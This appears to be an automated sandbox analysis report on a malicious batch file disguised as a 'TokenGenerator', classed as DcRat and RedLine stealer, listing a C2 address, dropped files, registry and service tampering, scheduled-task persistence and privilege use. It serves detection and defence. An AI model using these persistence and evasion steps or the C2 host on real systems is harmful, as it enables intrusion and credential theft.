dcrat | 97b786b850b37408f96541ba898f6f0032eecf76f6cb1f59ca8c750c5721688b

Resubmissions

29-08-2022 03:50

220829-ed6vwacdc8 10

29-08-2022 03:47

220829-ecjc7acda5 10

Analysis

max time kernel
137s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
29-08-2022 03:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TokenGenerator.bat
Size

24KB
MD5

e85403a4491b4ed319390201a735de7d
SHA1

bf93b11ce5d33046c8a110bff05d4c0e6b1d90a2
SHA256

97b786b850b37408f96541ba898f6f0032eecf76f6cb1f59ca8c750c5721688b
SHA512

d73ede4bae6b6cab73f46e7d7dda812fc1317ba6e1d0efff5d1ebca3015395b6ffa8c385b2005ec23603c835b478ea77c1ceba3ea12232e614604155e48e5859
SSDEEP

384:I55wqklVZlT/pHazFwZWvjKlFYatnvaY5o9GFIxqvFOcueWrC9:GY7azFwZSjKltvh5og6tcN8C9

Score

10^/10

dcrat redline dv discovery evasion exploit infostealer rat

Malware Config

Extracted

Family

redline

Botnet

195.3.223.79:65252

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe

Process spawned unexpected child process 36 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4604	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4984	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4256	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1148	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	804	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3092	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	396	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4068	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4452	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2184	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1676	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	456	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1080	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4744	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2024	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	808	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4940	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	460	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4152	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1580	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4752	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4724	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1568	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3020	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2820	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4932	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4520	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1300	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4792	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2436	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3456	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4648	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3396	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3544	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3116	1272	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4300	1272	schtasks.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\1.exe	family_redline
behavioral2/memory/4748-189-0x00000000001F0000-0x000000000020E000-memory.dmp	family_redline

DCRat payload 5 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\3.exe	dcrat
C:\Users\Admin\AppData\Local\Temp\3.exe	dcrat
C:\comsavesbroker\containersavesdhcp.exe	dcrat
C:\comsavesbroker\containersavesdhcp.exe	dcrat
behavioral2/memory/1532-224-0x0000000000800000-0x0000000000AB2000-memory.dmp	dcrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

16 3904 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

2.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts 2.exe
Executes dropped EXE 6 IoCs

Processes:

TokenGenerator.bat.exe1.exe2.exe3.exeupdaterchr.execontainersavesdhcp.exe

pid process

2404 TokenGenerator.bat.exe
4748 1.exe
1300 2.exe
2200 3.exe
1780 updaterchr.exe
1532 containersavesdhcp.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

4832 takeown.exe
3940 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
16	3904	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	2.exe

pid	process
4832	takeown.exe
3940	icacls.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

TokenGenerator.bat.exe2.exe3.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	TokenGenerator.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	WScript.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

4832 takeown.exe
3940 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

pid	process
4832	takeown.exe
3940	icacls.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe

Drops file in Program Files directory 22 IoCs

Processes:

containersavesdhcp.exe2.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Windows Multimedia Platform\conhost.exe	containersavesdhcp.exe
File created	C:\Program Files\Google\Chrome\updaterchr.exe	2.exe
File created	C:\Program Files\Windows Photo Viewer\en-US\Registry.exe	containersavesdhcp.exe
File created	C:\Program Files\Windows Photo Viewer\en-US\ee2ad38f3d4382	containersavesdhcp.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\cmd.exe	containersavesdhcp.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\conhost.exe	containersavesdhcp.exe
File opened for modification	C:\Program Files (x86)\Windows Multimedia Platform\RCXEE2D.tmp	containersavesdhcp.exe
File created	C:\Program Files (x86)\Windows Defender\fr-FR\conhost.exe	containersavesdhcp.exe
File created	C:\Program Files (x86)\Windows Defender\fr-FR\088424020bedd6	containersavesdhcp.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\088424020bedd6	containersavesdhcp.exe
File created	C:\Program Files (x86)\Google\Temp\smss.exe	containersavesdhcp.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\en-US\Registry.exe	containersavesdhcp.exe
File opened for modification	C:\Program Files (x86)\Google\Temp\smss.exe	containersavesdhcp.exe
File opened for modification	C:\Program Files\Google\Chrome\updaterchr.exe	2.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\conhost.exe	containersavesdhcp.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\RCXEB7C.tmp	containersavesdhcp.exe
File opened for modification	C:\Program Files (x86)\Google\Temp\RCXF63E.tmp	containersavesdhcp.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\ebf1f9fa8afd6d	containersavesdhcp.exe
File created	C:\Program Files (x86)\Google\Temp\69ddcba757bf72	containersavesdhcp.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\RCXDBB7.tmp	containersavesdhcp.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\en-US\RCXE62B.tmp	containersavesdhcp.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\cmd.exe	containersavesdhcp.exe

Drops file in Windows directory 8 IoCs

Processes:

containersavesdhcp.exe

description	ioc	process
File opened for modification	C:\Windows\Setup\State\containersavesdhcp.exe	containersavesdhcp.exe
File created	C:\Windows\schemas\Provisioning\csrss.exe	containersavesdhcp.exe
File opened for modification	C:\Windows\schemas\Provisioning\csrss.exe	containersavesdhcp.exe
File created	C:\Windows\schemas\Provisioning\886983d96e3d3e	containersavesdhcp.exe
File created	C:\Windows\Setup\State\containersavesdhcp.exe	containersavesdhcp.exe
File created	C:\Windows\Setup\State\e54f63597e9e2d	containersavesdhcp.exe
File opened for modification	C:\Windows\schemas\Provisioning\RCXD8B8.tmp	containersavesdhcp.exe
File opened for modification	C:\Windows\Setup\State\RCXF3AD.tmp	containersavesdhcp.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1204 sc.exe
2540 sc.exe
2772 sc.exe
1352 sc.exe
5008 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1204	sc.exe
2540	sc.exe
2772	sc.exe
1352	sc.exe
5008	sc.exe

Creates scheduled task(s) 1 TTPs 36 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
4984	schtasks.exe
4932	schtasks.exe
4792	schtasks.exe
4300	schtasks.exe
3092	schtasks.exe
2184	schtasks.exe
808	schtasks.exe
4940	schtasks.exe
4152	schtasks.exe
3020	schtasks.exe
2436	schtasks.exe
4604	schtasks.exe
1580	schtasks.exe
1568	schtasks.exe
1300	schtasks.exe
4752	schtasks.exe
2820	schtasks.exe
804	schtasks.exe
4452	schtasks.exe
460	schtasks.exe
4256	schtasks.exe
4068	schtasks.exe
1676	schtasks.exe
456	schtasks.exe
4744	schtasks.exe
4648	schtasks.exe
3544	schtasks.exe
3116	schtasks.exe
1148	schtasks.exe
396	schtasks.exe
1080	schtasks.exe
4724	schtasks.exe
4520	schtasks.exe
3456	schtasks.exe
3396	schtasks.exe
2024	schtasks.exe

Modifies data under HKEY_USERS 51 IoCs

Processes:

powershell.exeupdaterchr.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	updaterchr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	updaterchr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe

Modifies registry class 1 IoCs

Processes:

3.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings 3.exe
Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

992 reg.exe
4412 reg.exe
2412 reg.exe
1072 reg.exe
392 reg.exe
4980 reg.exe
2088 reg.exe
2868 reg.exe
3328 reg.exe
Runs net.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	3.exe

pid	process
992	reg.exe
4412	reg.exe
2412	reg.exe
1072	reg.exe
392	reg.exe
4980	reg.exe
2088	reg.exe
2868	reg.exe
3328	reg.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

TokenGenerator.bat.exepowershell.exepowershell.exepowershell.exepowershell.exe2.exepowershell.execontainersavesdhcp.exe

pid	process
2404	TokenGenerator.bat.exe
2404	TokenGenerator.bat.exe
3904	powershell.exe
3904	powershell.exe
992	powershell.exe
992	powershell.exe
3020	powershell.exe
3020	powershell.exe
4156	powershell.exe
4156	powershell.exe
1300	2.exe
4408	powershell.exe
4408	powershell.exe
1532	containersavesdhcp.exe
1532	containersavesdhcp.exe
1532	containersavesdhcp.exe
1532	containersavesdhcp.exe
1532	containersavesdhcp.exe
1532	containersavesdhcp.exe
1532	containersavesdhcp.exe
1532	containersavesdhcp.exe
1532	containersavesdhcp.exe
1532	containersavesdhcp.exe
1532	containersavesdhcp.exe
1532	containersavesdhcp.exe
1532	containersavesdhcp.exe
1532	containersavesdhcp.exe
1532	containersavesdhcp.exe
1532	containersavesdhcp.exe
1532	containersavesdhcp.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

TokenGenerator.bat.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	2404	TokenGenerator.bat.exe
Token: SeDebugPrivilege	3904	powershell.exe
Token: SeDebugPrivilege	992	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeShutdownPrivilege	3232	powercfg.exe
Token: SeCreatePagefilePrivilege	3232	powercfg.exe
Token: SeShutdownPrivilege	2544	powercfg.exe
Token: SeCreatePagefilePrivilege	2544	powercfg.exe
Token: SeShutdownPrivilege	920	powercfg.exe
Token: SeCreatePagefilePrivilege	920	powercfg.exe
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeShutdownPrivilege	2372	powercfg.exe
Token: SeCreatePagefilePrivilege	2372	powercfg.exe
Token: SeTakeOwnershipPrivilege	4832	takeown.exe
Token: SeIncreaseQuotaPrivilege	4156	powershell.exe
Token: SeSecurityPrivilege	4156	powershell.exe
Token: SeTakeOwnershipPrivilege	4156	powershell.exe
Token: SeLoadDriverPrivilege	4156	powershell.exe
Token: SeSystemProfilePrivilege	4156	powershell.exe
Token: SeSystemtimePrivilege	4156	powershell.exe
Token: SeProfSingleProcessPrivilege	4156	powershell.exe
Token: SeIncBasePriorityPrivilege	4156	powershell.exe
Token: SeCreatePagefilePrivilege	4156	powershell.exe
Token: SeBackupPrivilege	4156	powershell.exe
Token: SeRestorePrivilege	4156	powershell.exe
Token: SeShutdownPrivilege	4156	powershell.exe
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeSystemEnvironmentPrivilege	4156	powershell.exe
Token: SeRemoteShutdownPrivilege	4156	powershell.exe
Token: SeUndockPrivilege	4156	powershell.exe
Token: SeManageVolumePrivilege	4156	powershell.exe
Token: 33	4156	powershell.exe
Token: 34	4156	powershell.exe
Token: 35	4156	powershell.exe
Token: 36	4156	powershell.exe
Token: SeIncreaseQuotaPrivilege	4156	powershell.exe
Token: SeSecurityPrivilege	4156	powershell.exe
Token: SeTakeOwnershipPrivilege	4156	powershell.exe
Token: SeLoadDriverPrivilege	4156	powershell.exe
Token: SeSystemProfilePrivilege	4156	powershell.exe
Token: SeSystemtimePrivilege	4156	powershell.exe
Token: SeProfSingleProcessPrivilege	4156	powershell.exe
Token: SeIncBasePriorityPrivilege	4156	powershell.exe
Token: SeCreatePagefilePrivilege	4156	powershell.exe
Token: SeBackupPrivilege	4156	powershell.exe
Token: SeRestorePrivilege	4156	powershell.exe
Token: SeShutdownPrivilege	4156	powershell.exe
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeSystemEnvironmentPrivilege	4156	powershell.exe
Token: SeRemoteShutdownPrivilege	4156	powershell.exe
Token: SeUndockPrivilege	4156	powershell.exe
Token: SeManageVolumePrivilege	4156	powershell.exe
Token: 33	4156	powershell.exe
Token: 34	4156	powershell.exe
Token: 35	4156	powershell.exe
Token: 36	4156	powershell.exe
Token: SeIncreaseQuotaPrivilege	4156	powershell.exe
Token: SeSecurityPrivilege	4156	powershell.exe
Token: SeTakeOwnershipPrivilege	4156	powershell.exe
Token: SeLoadDriverPrivilege	4156	powershell.exe
Token: SeSystemProfilePrivilege	4156	powershell.exe
Token: SeSystemtimePrivilege	4156	powershell.exe
Token: SeProfSingleProcessPrivilege	4156	powershell.exe
Token: SeIncBasePriorityPrivilege	4156	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exeTokenGenerator.bat.execmd.exepowershell.exe2.execmd.execmd.exe

description	pid	process	target process
PID 644 wrote to memory of 2124	644	cmd.exe	net.exe
PID 644 wrote to memory of 2124	644	cmd.exe	net.exe
PID 2124 wrote to memory of 1744	2124	net.exe	net1.exe
PID 2124 wrote to memory of 1744	2124	net.exe	net1.exe
PID 644 wrote to memory of 2404	644	cmd.exe	TokenGenerator.bat.exe
PID 644 wrote to memory of 2404	644	cmd.exe	TokenGenerator.bat.exe
PID 2404 wrote to memory of 3904	2404	TokenGenerator.bat.exe	powershell.exe
PID 2404 wrote to memory of 3904	2404	TokenGenerator.bat.exe	powershell.exe
PID 2404 wrote to memory of 4148	2404	TokenGenerator.bat.exe	cmd.exe
PID 2404 wrote to memory of 4148	2404	TokenGenerator.bat.exe	cmd.exe
PID 4148 wrote to memory of 3540	4148	cmd.exe	choice.exe
PID 4148 wrote to memory of 3540	4148	cmd.exe	choice.exe
PID 4148 wrote to memory of 2772	4148	cmd.exe	attrib.exe
PID 4148 wrote to memory of 2772	4148	cmd.exe	attrib.exe
PID 3904 wrote to memory of 992	3904	powershell.exe	powershell.exe
PID 3904 wrote to memory of 992	3904	powershell.exe	powershell.exe
PID 3904 wrote to memory of 4748	3904	powershell.exe	1.exe
PID 3904 wrote to memory of 4748	3904	powershell.exe	1.exe
PID 3904 wrote to memory of 4748	3904	powershell.exe	1.exe
PID 3904 wrote to memory of 1300	3904	powershell.exe	2.exe
PID 3904 wrote to memory of 1300	3904	powershell.exe	2.exe
PID 3904 wrote to memory of 2200	3904	powershell.exe	3.exe
PID 3904 wrote to memory of 2200	3904	powershell.exe	3.exe
PID 3904 wrote to memory of 2200	3904	powershell.exe	3.exe
PID 1300 wrote to memory of 3020	1300	2.exe	powershell.exe
PID 1300 wrote to memory of 3020	1300	2.exe	powershell.exe
PID 1300 wrote to memory of 2000	1300	2.exe	cmd.exe
PID 1300 wrote to memory of 2000	1300	2.exe	cmd.exe
PID 1300 wrote to memory of 228	1300	2.exe	cmd.exe
PID 1300 wrote to memory of 228	1300	2.exe	cmd.exe
PID 2000 wrote to memory of 1204	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 1204	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 2540	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 2540	2000	cmd.exe	sc.exe
PID 228 wrote to memory of 3232	228	cmd.exe	powercfg.exe
PID 228 wrote to memory of 3232	228	cmd.exe	powercfg.exe
PID 2000 wrote to memory of 2772	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 2772	2000	cmd.exe	sc.exe
PID 1300 wrote to memory of 4156	1300	2.exe	powershell.exe
PID 1300 wrote to memory of 4156	1300	2.exe	powershell.exe
PID 228 wrote to memory of 2544	228	cmd.exe	powercfg.exe
PID 228 wrote to memory of 2544	228	cmd.exe	powercfg.exe
PID 2000 wrote to memory of 1352	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 1352	2000	cmd.exe	sc.exe
PID 228 wrote to memory of 920	228	cmd.exe	powercfg.exe
PID 228 wrote to memory of 920	228	cmd.exe	powercfg.exe
PID 2000 wrote to memory of 5008	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 5008	2000	cmd.exe	sc.exe
PID 228 wrote to memory of 2372	228	cmd.exe	powercfg.exe
PID 228 wrote to memory of 2372	228	cmd.exe	powercfg.exe
PID 2000 wrote to memory of 1072	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 1072	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 992	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 992	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 4412	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 4412	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 2412	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 2412	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 392	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 392	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 4832	2000	cmd.exe	takeown.exe
PID 2000 wrote to memory of 4832	2000	cmd.exe	takeown.exe
PID 2000 wrote to memory of 3940	2000	cmd.exe	icacls.exe
PID 2000 wrote to memory of 3940	2000	cmd.exe	icacls.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

2772 attrib.exe

pid	process
2772	attrib.exe

C:\Windows\system32\cmd.exe
